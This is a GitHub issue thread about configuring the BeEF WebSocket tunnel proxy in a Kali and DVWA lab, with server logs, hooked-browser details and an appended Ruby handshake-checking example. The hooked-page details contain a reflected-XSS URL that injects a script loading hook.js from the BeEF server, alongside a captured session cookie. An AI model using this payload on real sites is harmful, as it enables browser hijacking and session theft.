Problem with WebSocket Tunnel Proxy on Kali #947

Closed
ghost opened this issue Nov 25, 2013 · 5 comments
@ghost

ghost commented Nov 25, 2013

I'm able to get the Tunnel Proxy to work on port 6789, but I'm not able to get the websocket tunnel proxies to work (either secure or non-secure). I'm using beef 0.4.4.7 (alpha). I'm on Kali linux i386 gnome (Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux) running on VMFusion on OSX Mtn Lion, and have Ruby 1.9.3 installed (ruby 1.9.3p194 (2012-04-20 revision 35410) [i486-linux]). I updated the config.yaml to enable websockets. I cleared the history of both the hooked browser and the browser that is set up to proxy through the hooked browser. The hooked browser is FireFox v23.0.1 (OSX). The browser set up to proxy through the hooked browser is IceWeasel v18.0.1 (Kali) using FoxyProxy Basic (plug-in) v3.2.3. I noticed that the BeEF server console displays that it started the WebSocket server on port 61985, but the timer is null (even though the timer value is set in config.yaml). The BeEF server console also displays a message that a new websocket channel has been opened when I attempt to access the same web server (same SOP) as the hooked browser accessed, but the browser errors with "connection was reset". The browser detailed info of the hooked browser states it supports websockets. I would appreciate any suggestions on what might be the cause of this (I'm still continuing to troubleshoot but running out of ideas of what it might be).

Thanks!

~Tony

config.yaml (websockets)
# Prefer WebSockets over XHR-polling when possible.
websocket:
    enable: true
    secure: true # use WebSocketSecure work only on https domain and with https support enabled in BeEF
    port: 61985 # WS: good success rate through proxies
    secure_port: 61986 # WSSecure
    ws_poll_timeout: 1000 # poll BeEF every second

BeEF server output:
root@kali:/usr/share/beef# clear; ruby beef -x -v

[10:07:43][>] Loaded extension: 'proxy'
[10:07:43][>] Loaded extension: 'xssrays'
[10:07:43][>] Loaded extension: 'demos'
[10:07:43][>] Loaded extension: 'autoloader'
[10:07:43][>] Loaded extension: 'requester'
[10:07:43][>] Loaded extension: 'events'
[10:07:43][>] Loaded extension: 'admin_ui'
[10:07:43][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[10:07:43][>] Loaded extension: 'ipec'
[10:07:43][>] Loaded extension: 'social_engineering'
[10:07:43][>] Loaded extension: 'console'
[10:07:43][*] Browser Exploitation Framework (BeEF) 0.4.4.7-alpha
[10:07:43] | Twit: @beefproject
[10:07:43] | Site: http://beefproject.com
[10:07:43] | Blog: http://blog.beefproject.com
[10:07:43] |_ Wiki: https://github.com/beefproject/beef/wiki
[10:07:43][*] Project Creator: Wade Alcorn (@wadealcorn)
[10:07:44][*] 10 extensions enabled.
[10:07:44][*] 182 modules enabled.
[10:07:44][*] 2 network interfaces were detected.
[10:07:44][+] running on network interface: 127.0.0.1
[10:07:44] | Hook URL: http://127.0.0.1:3000/hook.js
[10:07:44] |_ UI URL: http://127.0.0.1:3000/ui/panel
[10:07:44][+] running on network interface: 192.168.100.138
[10:07:44] | Hook URL: http://192.168.100.138:3000/hook.js
[10:07:44] |_ UI URL: http://192.168.100.138:3000/ui/panel
[10:07:44][*] RESTful API key: a7ea8fc84a99ac78f4a49dbc89ea9d9b4934f725
[10:07:44][*] Starting WebSocket server on port [61985], timer []
[10:07:44][*] Starting WebSocketSecure server on port [61986], timer []
[10:07:44][*] HTTP Proxy: http://127.0.0.1:6789
[10:07:44][*] BeEF server started (press control+c to stop)
[10:08:05][>] New WebSocket channel open.
[10:08:05][>] WebSocket - Browser says helo! WebSocket is running
[10:08:05][>] [INIT] Processing Browser Details...
[10:08:05][>] WebSocket - activeSocket content [{"AVUeIEVClGg2zwjTfLAgb1y3oB3tEO9S5dlXvWKFKOHFA1kcpFzkBLHrq2ybOjV0HRIqyKtGv6wzAQsy"=>#<EventMachine::WebSocket::Connection:0xa5c6c28 @Signature=30, @options={:host=>"0.0.0.0", :port=>61985}, @debug=false, @secure=false, @tls_options={}, @DaTa=nil, @OnMessage=#Proc:0xa5c673c@/usr/share/beef/core/main/network_stack/websocket/websocket.rb:170, @handler=#<EventMachine::WebSocket::Handler13:0xa5f8624 @request={"method"=>"GET", "path"=>"/", "query"=>{}, "host"=>#<Addressable::URI:0x52fc4e8 URI:ws://192.168.100.138:61985>, "user-agent"=>"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0", "accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8", "accept-language"=>"en-US,en;q=0.5", "accept-encoding"=>"gzip, deflate", "sec-websocket-version"=>"13", "origin"=>"http://192.168.100.139", "sec-websocket-key"=>"+PGvxJYGdsUtNdXF3OyJRw==", "connection"=>"keep-alive, Upgrade", "pragma"=>"no-cache", "cache-control"=>"no-cache", "upgrade"=>"websocket"}, @connection=#<EventMachine::WebSocket::Connection:0xa5c6c28 ...>, @debug=false, @State=:connected, @DaTa="\x81\xDC\xD4\xBD[\x1D\xAF\x9F:q\xBD\xCB>?\xEE\x9F\x1AK\x81\xD8\x12X\x82\xFE7Z\xB3\x8F!j\xBE\xE9=Q\x95\xDA9,\xAD\x8E4_\xE7\xC9\x1ER\xED\xEEny\xB8\xE5-J\x9F\xFB\x10R\x9C\xFB\x1A,\xBF\xDE+[\xAE\xD6\x19Q\x9C\xCF_/\xAD\xDF\x14w\x82\x8D\x13O\x9D\xCC"V\xA0\xFA-+\xA3\xC7\x1AL\xA7\xC4y`", @application_data_buffer="">>}]
[10:08:05][!] [Browser Details] Invalid page title returned from the hook browser's initial connection.
[10:08:05][*] New Hooked Browser [id:1, ip:192.168.100.1, type:FF-23, os:Intel Mac OS X 10.8], hooked domain [192.168.100.139:80]
[10:08:16][*] Using Hooked Browser with ip [192.168.100.1] as Tunneling Proxy
[10:08:39][>] New WebSocket channel open.
[10:08:53][>] [PROXY] --> Forwarding request #1: domain[192.168.100.139:80], method[GET], path[/], cross domain[true]
[10:08:53][>] [PROXY] <-- Response for request #1 to [/] on domain [192.168.100.139:80] correctly processed
[10:08:53][>] [PROXY] --> Forwarding request #2: domain[192.168.100.139:80], method[GET], path[/index.css], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #4: domain[192.168.100.139:80], method[GET], path[/images/owasp.png], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #5: domain[192.168.100.139:80], method[GET], path[/jquery.min.js], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #6: domain[192.168.100.139:80], method[GET], path[/images/Knob_Add.png], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #3: domain[192.168.100.139:80], method[GET], path[/animatedcollapse.js], cross domain[true]
[10:08:53][>] [PROXY] --> Forwarding request #7: domain[192.168.100.139:80], method[GET], path[/images/mandiant.png], cross domain[true]
[10:08:54][>] [PROXY] <-- Response for request #2 to [/index.css] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] <-- Response for request #5 to [/jquery.min.js] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] <-- Response for request #7 to [/images/mandiant.png] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] <-- Response for request #6 to [/images/Knob_Add.png] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] <-- Response for request #3 to [/animatedcollapse.js] on domain [192.168.100.139:80] correctly processed
[10:08:54][>] [PROXY] --> Forwarding request #8: domain[192.168.100.139:80], method[GET], path[/images/Knob_Attention.png], cross domain[true]
[10:08:54][>] [PROXY] <-- Response for request #4 to [/images/owasp.png] on domain [192.168.100.139:80] correctly processed
[10:08:55][>] [PROXY] <-- Response for request #8 to [/images/Knob_Attention.png] on domain [192.168.100.139:80] correctly processed

Hooked Browser Details:
Browser Name: Firefox
Browser Version: 23
Browser UA String: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Browser Platform: MacIntel
Browser Plugins: Shockwave Flash-v.11.9.900.117,QuickTime Plug-in 7.7.1-v.7.7.1,Java Applet Plug-in-v.Java 7 Update 25,iPhotoPhotocast-v.7.0,SharePoint Browser Plug-in-v.14.3.4,WebEx64 General Plugin Container-v.1.0,Silverlight Plug-In-v.5.1.10411.0,Citrix Receiver Plug-in-v.11.4.3
Window Size: Width: 1243, Height: 781

Category: Browser Components (16 Items)
Flash: Yes
Java: No
VBScript: No
PhoneGap: No
Google Gears: No
Silverlight: Yes
Web Sockets: Yes
QuickTime: Yes
RealPlayer: No
Windows Media Player: No
VLC: No
Foxit Reader: No
WebRTC: Yes
ActiveX: No
Session Cookies: Yes
Persistent Cookies: Yes

Category: Hooked Page (4 Items)
Page URI: http://192.168.100.139/dvwa/vulnerabilities/xss_r/?name=%3Cscript+src%3D%22http%3A%2F%2F192.168.100.138%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E#
Page Referrer: Unknown
Host Name/IP: 192.168.100.139
Cookies: security=low; PHPSESSID=4agdflb0ffd8jbi865qkc038u4

Category: Host (6 Items)
Date: Mon Nov 25 2013 10:08:04 GMT-0500 (EST)
Operating System: Intel Mac OS X 10.8
Hardware: Unknown
CPU: 32-bit
Screen Size: Width: 2560, Height: 1440, Colour Depth: 24
Touch Screen: No

@antisnatchor
Contributor

Are you using http://<beef_server>:6789/ as the proxy address?
Are you able to launch command modules to the hooked browser using the websocket communication channel? Do you get responses? What about using the Requester component to send requests to other DVWA pages?

@ghost
Author

ghost commented Nov 25, 2013

Thanks for the quick response.

As stated, using 127.0.0.1:6789 works fine; it is the web sockets proxy (using 127.0.0.1:61985) that is not working for me. Nothing else is using that port (I checked).
I was able to use the Port Scanner command module, I assume that uses web sockets. It worked fine.
I was able to use the Test Network Request and send a GET request to other DVWA pages which returned the page with 200 status.

@ghost
Author

ghost commented Nov 25, 2013

I may have misunderstood how the web sockets proxy works. Do I continue to use port 6789 for my proxy when websockets is enabled? I thought I was supposed to change my browser proxy to :61985 for non-secure websockets and 61986 for secure websockets. Is that correct or incorrect?

@ghost
Author

ghost commented Nov 25, 2013

Michele, my apologies. I misunderstood. I thought when websockets was enabled that I had to change the proxy to 61985. I compared sending requests both with websockets disabled, and then enabled, both times using :6789, and the time it took to respond for each was significantly different. I now understand that the reference is to the ports the websockets are using, NOT for the proxy (which remains 6789). Thanks again for the response, apologies for wasting time.

@antisnatchor
Contributor

No problems mate ;-)
Those WS and WSS ports are used internally by BeEF, you still want to use 6789 as default proxy port ;-)
BeEF takes care of the rest for you.

Glad you like the project. If you think of any improvements/bugs in the tunneling proxy component, let me know.
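
An added example (not part of the thread and not BeEF's own code) of why pointing a browser's HTTP proxy setting at port 61985 cannot work: what the browser sends there is not an RFC 6455 opening handshake. The first request is rebuilt from the handshake headers in the server output above; the proxy-style request and the names `handshake_problems` and `accept_for` are illustrative assumptions.

```ruby
require 'digest/sha1'
WS_GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' # fixed GUID defined by RFC 6455

# Rebuilt from the handshake headers logged by the WebSocket server on 61985.
HOOK_HANDSHAKE = <<~REQ
  GET / HTTP/1.1
  Host: 192.168.100.138:61985
  Upgrade: websocket
  Connection: keep-alive, Upgrade
  Origin: http://192.168.100.139
  Sec-WebSocket-Version: 13
  Sec-WebSocket-Key: +PGvxJYGdsUtNdXF3OyJRw==
REQ

# Constructed sample: what a browser sends to a host:port configured as HTTP proxy.
PROXY_REQUEST = <<~REQ
  GET http://192.168.100.139/ HTTP/1.1
  Host: 192.168.100.139
  Proxy-Connection: keep-alive
REQ

# Split a raw request head into [[verb, target, version], {lower-cased header => value}].
def parse_request(raw)
  first, *rest = raw.split(/\r?\n/)
  headers = rest.take_while { |l| !l.empty? }.to_h do |l|
    name, value = l.split(':', 2)
    [name.strip.downcase, value.to_s.strip]
  end
  [first.to_s.split(' ', 3), headers]
end

# Reasons the request is not a WebSocket opening handshake (empty list = valid).
def handshake_problems(raw)
  (verb, target, _), h = parse_request(raw)
  conn = h['connection'].to_s.downcase.split(/\s*,\s*/)
  checks = {
    'method is not GET' => verb == 'GET',
    'absolute-URI target (proxy-style request)' => target.to_s !~ %r{\Ahttps?://}i,
    'no "Upgrade: websocket" header' => h['upgrade'].to_s.downcase == 'websocket',
    'Connection header lacks the Upgrade token' => conn.include?('upgrade'),
    'Sec-WebSocket-Version is not 13' => h['sec-websocket-version'] == '13',
    'Sec-WebSocket-Key is not 16 base64-encoded bytes' => h['sec-websocket-key'].to_s.unpack1('m').bytesize == 16
  }
  checks.reject { |_, ok| ok }.keys
end

# Sec-WebSocket-Accept value a server returns for a given client key.
def accept_for(key)
  [Digest::SHA1.digest(key + WS_GUID)].pack('m0')
end
```

The hooked browser's request passes every check, while the proxy-style request fails five of them, which is why the proxy client stays on 6789 and only hooked browsers talk to 61985/61986.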
